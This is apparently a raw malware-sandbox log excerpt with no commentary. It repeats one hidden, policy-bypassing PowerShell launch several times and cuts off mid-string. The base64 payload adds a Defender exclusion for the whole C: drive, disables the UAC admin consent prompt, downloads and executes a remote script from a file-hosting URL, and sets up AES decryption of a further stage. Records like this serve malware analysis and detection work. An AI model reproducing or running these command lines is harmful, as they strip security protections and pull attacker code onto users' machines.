Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ